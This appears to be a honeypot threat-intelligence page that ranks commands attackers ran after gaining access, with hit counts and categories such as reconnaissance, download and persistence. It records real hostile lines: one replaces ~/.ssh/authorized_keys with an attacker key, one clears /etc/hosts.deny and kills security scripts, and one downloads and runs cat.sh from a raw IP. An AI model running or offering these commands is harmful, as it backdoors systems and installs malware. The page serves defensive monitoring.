Executed Commands

Real-time analysis of the most executed commands by attackers after gaining system access. Data collected from our global honeypot network in the last 24 hours.

9789 commands in 24h

Top Executed Commands

$Enter new UNIX password:

277 IPs687x

$uname -s -v -n -m 2 > /dev/null

151 IPs516x

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version

144 IPs469x

$lockr -ia .ssh

337 IPs468x

$cd ~; chattr -ia .ssh; lockr -ia .ssh

296 IPs391x

$uname -a

284 IPs379x

$uname

286 IPs376x

cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

292 IPs375x

$cat /proc/cpuinfo | grep name | wc -l

288 IPs373x

10.

$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

289 IPs371x

11.

$uname -m

276 IPs366x

12.

$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

279 IPs363x

13.

$crontab -l

275 IPs361x

14.

$whoami

276 IPs361x

15.

$w

276 IPs359x

16.

$lscpu | grep Model

273 IPs357x

17.

$cat /proc/cpuinfo | grep model | grep name | wc -l

273 IPs356x

18.

$top

270 IPs355x

19.

$which ls

267 IPs344x

20.

$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

266 IPs340x

21.

$ls -lh $(which ls)

258 IPs317x

22.

$cat /proc/uptime 2 > /dev/null | cut -d. -f1

57 IPs301x

23.

$uname -m 2 > /dev/null

57 IPs159x

24.

rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

73 IPs75x

25.

$/bin/./uname -s -v -n -r -m

15 IPs37x

26.

$uname -s -v -n -r -m

13 IPs28x

27.

$if [ [ ! -d ${HOME}/.ssh ] ]

6 IPs15x

28.

$then

6 IPs15x

29.

$nproc

6 IPs14x

30.

cd /data/local/tmp/; wget http://140.233.190.82/cat.sh || curl http://140.233.190.82/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android

4 IPs13x

Reconnaissance

Commands to gather system information (uname, whoami, cat /etc/passwd)

Download

Commands to download malware (wget, curl, tftp)

Persistence

Commands to maintain access (crontab, chmod, chattr)

Lateral Movement

Commands to spread across the network (ssh, scp, ping)

About this data

These commands are captured in real-time when attackers gain access to our honeypots. They represent actual techniques used in automated and manual attacks. Use this information to improve your threat detection and incident response.